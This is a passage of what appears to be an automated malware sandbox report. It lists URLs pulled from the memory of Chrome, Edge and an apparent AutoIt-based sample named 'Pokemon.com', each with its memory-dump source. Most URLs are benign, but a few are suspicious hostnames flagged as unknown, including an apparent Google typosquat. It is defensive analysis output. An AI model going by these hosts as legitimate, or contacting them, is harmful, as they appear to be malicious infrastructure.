                                                                  https://anglebug.com/7382chrome.exe, 00000010.00000003.2626599628.00007C1C003A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2626653750.00007C1C00DC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2713153139.00007C1C00C20000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://deff.nelreports.net/api/report?cat=msnReporting and NEL.23.dr, 2cc80dabc69f58b6_0.22.drfalse
                                                                      		high
                                                                      https://deff.nelreports.net/api/reportReporting and NEL.23.drfalse
                                                                        		high
                                                                        http://polymer.github.io/AUTHORS.txtchrome.exe, 00000010.00000003.2629259994.00007C1C00F18000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2630329841.00007C1C01090000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2630096261.00007C1C00F5C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2630975839.00007C1C00F0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2631185270.00007C1C00DC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2632365817.00007C1C010D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2705610854.00007C1C002FB000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2630053349.00007C1C010C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2632061196.00007C1C003B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2631673136.00007C1C00F84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2632631737.00007C1C0120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2629497172.00007C1C01074000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://docs.google.com/chrome.exe, 00000010.00000002.2705712223.00007C1C00310000.00000004.00000800.00020000.00000000.sdmp, manifest.json0.22.drfalse
                                                                            		high
                                                                            https://docs.google.com/presentation/oglchrome.exe, 00000010.00000002.2704552562.00007C1C0001C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              http://unisolated.invalid/chrome.exe, 00000010.00000002.2710713687.00007C1C00968000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://photos.google.com?referrer=CHROME_NTPchrome.exe, 00000010.00000003.2632365817.00007C1C010D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2632061196.00007C1C003B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2632631737.00007C1C0120C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://drive.google.com/?lfhs=2ation.Resultchrome.exe, 00000010.00000002.2716262527.00007C1C01310000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://ogs.google.com/widget/callout?eom=1chrome.exe, 00000010.00000003.2670389834.00007C1C02C80000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      http://anglebug.com/6929chrome.exe, 00000010.00000003.2626599628.00007C1C003A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2626653750.00007C1C00DC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2713153139.00007C1C00C20000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://docs.googl0chrome.exe, 00000010.00000002.2705712223.00007C1C00310000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          https://anglebug.com/7246chrome.exe, 00000010.00000003.2626599628.00007C1C003A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2626653750.00007C1C00DC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2713153139.00007C1C00C20000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            https://anglebug.com/7369chrome.exe, 00000010.00000002.2704552562.00007C1C0001C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000014.00000003.2773681849.00005C8400380000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              https://anglebug.com/7489chrome.exe, 00000010.00000003.2626599628.00007C1C003A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2626653750.00007C1C00DC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2706524682.00007C1C004B0000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000014.00000003.2773681849.00005C8400380000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                https://drive-daily-2.corp.google.com/chrome.exe, 00000010.00000003.2622417886.00007C1C004A4000.00000004.00000800.00020000.00000000.sdmp, manifest.json0.22.drfalse
                                                                                                  		high
                                                                                                  http://polymer.github.io/PATENTS.txtchrome.exe, 00000010.00000003.2629259994.00007C1C00F18000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2630329841.00007C1C01090000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2630096261.00007C1C00F5C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2630975839.00007C1C00F0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2631185270.00007C1C00DC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2632365817.00007C1C010D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2705610854.00007C1C002FB000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2630053349.00007C1C010C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2632061196.00007C1C003B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2631673136.00007C1C00F84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2632631737.00007C1C0120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2629497172.00007C1C01074000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    http://www.autoitscript.com/autoit3/XPokemon.com, 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmp, Investigator.9.dr, Pokemon.com.2.drfalse
                                                                                                      		high
                                                                                                      https://issuetracker.google.com/161903006chrome.exe, 00000010.00000003.2626653750.00007C1C00DC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2714074595.00007C1C00D54000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        https://www.ecosia.org/newtab/Pokemon.com, 0000000C.00000002.3074481165.0000000004210000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2706524682.00007C1C004B0000.00000004.00000800.00020000.00000000.sdmp, WLFCTJ.12.drfalse
                                                                                                          		high
                                                                                                          https://drive-daily-5.corp.google.com/chrome.exe, 00000010.00000003.2622417886.00007C1C004A4000.00000004.00000800.00020000.00000000.sdmp, manifest.json0.22.drfalse
                                                                                                            		high
                                                                                                            https://docs.google.com/spreadsheets/u/0/create?usp=chrome_actionschrome.exe, 00000010.00000002.2713588754.00007C1C00C90000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2706664303.00007C1C00500000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2708399052.00007C1C00724000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              https://myaccount.google.com/data-and-privacy?utm_source=ga-chrome-actions&utm_medium=managePrivacychrome.exe, 00000010.00000002.2706727597.00007C1C00518000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2708399052.00007C1C00724000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2707753024.00007C1C006AC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                https://bzib.nelreports.net/api/report?cat=bingbusinessReporting and NEL.23.drfalse
                                                                                                                  		high
                                                                                                                  https://permanently-removed.invalid/v1/issuetokenmsedge.exe, 00000014.00000003.2773334490.00005C8400270000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    		high
                                                                                                                    https://ogs.googchrome.exe, 00000010.00000002.2715290296.00007C1C0101E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      		high
                                                                                                                      http://anglebug.com/4722chrome.exe, 00000010.00000003.2626599628.00007C1C003A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2626653750.00007C1C00DC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2713153139.00007C1C00C20000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        		high
                                                                                                                        https://m.google.com/devicemanagement/data/apichrome.exe, 00000010.00000002.2705307767.00007C1C0020C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          		high
                                                                                                                          https://permanently-removed.invalid/reauth/v1beta/users/msedge.exe, 00000014.00000003.2773334490.00005C8400270000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            		high
                                                                                                                            https://docs.google.com/presentation/u/0/create?usp=chrome_actionschrome.exe, 00000010.00000002.2713588754.00007C1C00C90000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2706664303.00007C1C00500000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2708399052.00007C1C00724000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              		high
                                                                                                                              https://drive-daily-4.cchrome.exe, 00000010.00000002.2705712223.00007C1C00310000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                		high
                                                                                                                                https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&refPokemon.com, 0000000C.00000002.3074481165.00000000041F4000.00000004.00000800.00020000.00000000.sdmp, Pokemon.com, 0000000C.00000002.3074481165.0000000004193000.00000004.00000800.00020000.00000000.sdmp, Pokemon.com, 0000000C.00000002.3073484431.0000000000E08000.00000004.00000020.00020000.00000000.sdmp, AS26FU.12.drfalse
                                                                                                                                  		high
                                                                                                                                  https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477Pokemon.com, 0000000C.00000002.3074481165.00000000041F4000.00000004.00000800.00020000.00000000.sdmp, Pokemon.com, 0000000C.00000002.3074481165.0000000004193000.00000004.00000800.00020000.00000000.sdmp, Pokemon.com, 0000000C.00000002.3073484431.0000000000E08000.00000004.00000020.00020000.00000000.sdmp, AS26FU.12.drfalse
                                                                                                                                    		high
                                                                                                                                    https://publickeyservice.pa.gcp.privacysandboxservices.comchrome.exe, 00000010.00000003.2662793010.00007C1C0240C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      https://permanently-removed.invalid/RotateBoundCookiesmsedge.exe, 00000014.00000003.2773334490.00005C8400270000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        https://docs.google.com/document/doglchrome.exe, 00000010.00000002.2715928120.00007C1C012D8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          		high
                                                                                                                                          http://anglebug.com/3502chrome.exe, 00000010.00000003.2626599628.00007C1C003A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2626653750.00007C1C00DC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2713153139.00007C1C00C20000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            		high
                                                                                                                                            http://anglebug.com/3623chrome.exe, 00000010.00000003.2626653750.00007C1C00DC8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              		high
                                                                                                                                              http://anglebug.com/3625chrome.exe, 00000010.00000003.2626653750.00007C1C00DC8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                		high
                                                                                                                                                http://anglebug.com/3624chrome.exe, 00000010.00000003.2626653750.00007C1C00DC8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                  		high
                                                                                                                                                  https://t.mPokemon.com, 0000000C.00000003.2439032795.0000000000D70000.00000004.00000020.00020000.00000000.sdmp, Pokemon.com, 0000000C.00000003.2439197434.0000000003F39000.00000004.00000800.00020000.00000000.sdmp, Pokemon.com, 0000000C.00000003.2439337123.0000000003FB4000.00000004.00000800.00020000.00000000.sdmp, Pokemon.com, 0000000C.00000003.2439113890.0000000003FB4000.00000004.00000800.00020000.00000000.sdmp, Pokemon.com, 0000000C.00000003.2439095251.0000000003FE2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                    		high
                                                                                                                                                    https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYiPokemon.com, 0000000C.00000002.3073484431.0000000000E08000.00000004.00000020.00020000.00000000.sdmp, AS26FU.12.drfalse
                                                                                                                                                      		high
                                                                                                                                                      http://anglebug.com/3862chrome.exe, 00000010.00000003.2626599628.00007C1C003A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2709149181.00007C1C0080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2626653750.00007C1C00DC8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000014.00000003.2773681849.00005C8400380000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                        		high
                                                                                                                                                        https://chrome.google.com/webstoreLDDiscoverchrome.exe, 00000010.00000003.2628640201.00007C1C00D8C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2626391112.00007C1C00C48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2643146123.00007C1C00C60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2689129631.00007C1C0033C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2637997719.00007C1C00D8C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                          		high
                                                                                                                                                          http://anglebug.com/4836chrome.exe, 00000010.00000002.2707388637.00007C1C00628000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2626653750.00007C1C00DC8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000014.00000003.2773681849.00005C8400380000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                            		high
                                                                                                                                                            https://issuetracker.google.com/issues/166475273chrome.exe, 00000010.00000003.2626653750.00007C1C00DC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2713081034.00007C1C00C0C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                              		high
                                                                                                                                                              https://ch.search.yahoo.com/favicon.icochrome.exe, 00000010.00000003.2632036175.00007C1C00BC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2649270304.00007C1C00BC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2684694630.00007C1C00BC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2712793704.00007C1C00BCC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2625679705.00007C1C00BCC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2672047195.00007C1C00BCC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                		high
                                                                                                                                                                http://anglebug.com/3970chrome.exe, 00000010.00000002.2707388637.00007C1C00628000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2626653750.00007C1C00DC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2713153139.00007C1C00C20000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                  		high
                                                                                                                                                                  https://apis.google.comchrome.exe, 00000010.00000003.2670389834.00007C1C02C80000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                    		high
                                                                                                                                                                    https://support.mozilla.org/products/firefoxgro.allPokemon.com, 0000000C.00000002.3080713787.0000000006B13000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                      		high
                                                                                                                                                                      http://polymer.github.io/CONTRIBUTORS.txtchrome.exe, 00000010.00000003.2629259994.00007C1C00F18000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2630329841.00007C1C01090000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2630096261.00007C1C00F5C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2630975839.00007C1C00F0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2631185270.00007C1C00DC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2632365817.00007C1C010D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2705610854.00007C1C002FB000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2630053349.00007C1C010C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2632061196.00007C1C003B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2631673136.00007C1C00F84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2632631737.00007C1C0120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2629497172.00007C1C01074000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                        		high
                                                                                                                                                                        https://labs.google.com/search?source=ntpchrome.exe, 00000010.00000002.2706334888.00007C1C00428000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2669760383.00007C1C02C30000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2670976589.00007C1C02C30000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                          		high
                                                                                                                                                                          https://google-ohttp-relay-query.fastly-edge.com/2Pchrome.exe, 00000010.00000003.2662793010.00007C1C0240C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2665322466.00001B0400974000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2617231990.00001B040071C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                            		high
                                                                                                                                                                            https://drive-daily-5.corp.gochrome.exe, 00000010.00000002.2705712223.00007C1C00310000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                              		high
                                                                                                                                                                              http://anglebug.com/5901chrome.exe, 00000010.00000003.2626599628.00007C1C003A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2626653750.00007C1C00DC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2713153139.00007C1C00C20000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                		high
                                                                                                                                                                                http://anglebug.com/3965chrome.exe, 00000010.00000002.2707577434.00007C1C00678000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000014.00000003.2773681849.00005C8400380000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                  		high
                                                                                                                                                                                  https://anglebug.com/7161chrome.exe, 00000010.00000003.2626599628.00007C1C003A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2626653750.00007C1C00DC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2713153139.00007C1C00C20000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                    		high
                                                                                                                                                                                    https://anglebug.com/7162chrome.exe, 00000010.00000003.2626599628.00007C1C003A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2626653750.00007C1C00DC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2704552562.00007C1C0001C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000014.00000003.2773681849.00005C8400380000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                      		high
                                                                                                                                                                                      http://anglebug.com/5906chrome.exe, 00000010.00000002.2706524682.00007C1C004B0000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000014.00000003.2774531474.00005C840037C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000014.00000003.2773681849.00005C8400380000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                        		high
                                                                                                                                                                                        http://anglebug.com/2517chrome.exe, 00000010.00000003.2626599628.00007C1C003A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2707388637.00007C1C00628000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2626653750.00007C1C00DC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2713153139.00007C1C00C20000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                          		high
                                                                                                                                                                                          https://permanently-removed.invalid/MergeSessionmsedge.exe, 00000014.00000003.2773334490.00005C8400270000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                            		high
                                                                                                                                                                                            http://anglebug.com/4937chrome.exe, 00000010.00000003.2626599628.00007C1C003A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2626653750.00007C1C00DC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2713153139.00007C1C00C20000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                              		high
                                                                                                                                                                                              https://issuetracker.google.com/166809097chrome.exe, 00000010.00000003.2626653750.00007C1C00DC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2714428198.00007C1C00DEC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                		high
                                                                                                                                                                                                https://fa5lt.xyztosh;Pokemon.com, 0000000C.00000002.3076149953.00000000043DC000.00000040.00001000.00020000.00000000.sdmp, Pokemon.com, 0000000C.00000002.3076149953.00000000042AC000.00000040.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                                                		unknown
                                                                                                                                                                                                https://lens.google.com/v3/uploadchrome.exe, 00000010.00000003.2618297777.00001B040087C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2703809491.00001B0400920000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2703743350.00001B04008D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2632061196.00007C1C003B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2632631737.00007C1C0120C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  		high
                                                                                                                                                                                                  http://anglebug.com/3832chrome.exe, 00000010.00000002.2707577434.00007C1C00678000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000014.00000003.2773681849.00005C8400380000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    		high
                                                                                                                                                                                                    https://www.google.comAccess-Control-Allow-Credentials:chrome.exe, 00000010.00000003.2649479606.00007C1C002A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2649516669.00007C1C0135C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      		high
                                                                                                                                                                                                      https://drive-daily-0.corp.google.com/chrome.exe, 00000010.00000003.2622417886.00007C1C004A4000.00000004.00000800.00020000.00000000.sdmp, manifest.json0.22.drfalse
                                                                                                                                                                                                        		high
                                                                                                                                                                                                        https://permanently-removed.invalid/Logoutmsedge.exe, 00000014.00000003.2773334490.00005C8400270000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          		high
                                                                                                                                                                                                          https://optimizatgoogs.cm/downlMIZATIONchrome.exe, 00000010.00000002.2709791438.00007C1C008AC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          https://lens.google.com/uploadchrome.exe, 00000010.00000003.2632365817.00007C1C010D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2632061196.00007C1C003B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2632631737.00007C1C0120C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            		high
                                                                                                                                                                                                            https://docs.google.com/document/?usp=installed_webappchrome.exe, 00000010.00000003.2684694630.00007C1C00BC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2712793704.00007C1C00BCC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2625434291.00007C1C00C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2713081034.00007C1C00C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2715561352.00007C1C01154000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2716151641.00007C1C012F9000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2672047195.00007C1C00BCC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2706275166.00007C1C0041C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              		high
                                                                                                                                                                                                              http://anglebug.com/6651chrome.exe, 00000010.00000003.2626599628.00007C1C003A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2626653750.00007C1C00DC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2713153139.00007C1C00C20000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                		high
                                                                                                                                                                                                                https://anglebug.com/4830chrome.exe, 00000010.00000003.2626599628.00007C1C003A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2707388637.00007C1C00628000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2626653750.00007C1C00DC8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                  		high
                                                                                                                                                                                                                  https://docs.google.com/presentation/installwebapp?usp=chrome_defaultmetadataameeschrome.exe, 00000010.00000002.2707021602.00007C1C005C4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                    		high
                                                                                                                                                                                                                    https://www.youtube.com/:chrome.exe, 00000010.00000002.2714074595.00007C1C00D54000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2706275166.00007C1C0041C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                      		high
                                                                                                                                                                                                                      https://mail.google.com/mail/chrome.exe, 00000010.00000002.2713153139.00007C1C00C20000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                        		high
                                                                                                                                                                                                                        https://myaccount.google.com/shielded-email2Bchrome.exe, 00000010.00000003.2662793010.00007C1C0240C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                          		high
                                                                                                                                                                                                                          https://www.google.com/tools/feedback/chrome/__submitchrome.exe, 00000010.00000002.2706590684.00007C1C004D0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                            		high
                                                                                                                                                                                                                            http://anglebug.com/2162chrome.exe, 00000010.00000003.2626599628.00007C1C003A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2626653750.00007C1C00DC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2713153139.00007C1C00C20000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                              		high
                                                                                                                                                                                                                              http://anglebug.com/5430chrome.exe, 00000010.00000002.2707577434.00007C1C00678000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000014.00000003.2773681849.00005C8400380000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                		high
                                                                                                                                                                                                                                https://permanently-removed.invalid/LogoutYxABzenmsedge.exe, 00000014.00000003.2773334490.00005C8400270000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                  		high
                                                                                                                                                                                                                                  https://chrome.google.com/webstore206E5chrome.exe, 00000010.00000002.2707388637.00007C1C00628000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                    		high
                                                                                                                                                                                                                                    http://anglebug.com/3498chrome.exe, 00000010.00000003.2626599628.00007C1C003A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2626653750.00007C1C00DC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2713153139.00007C1C00C20000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                      		high
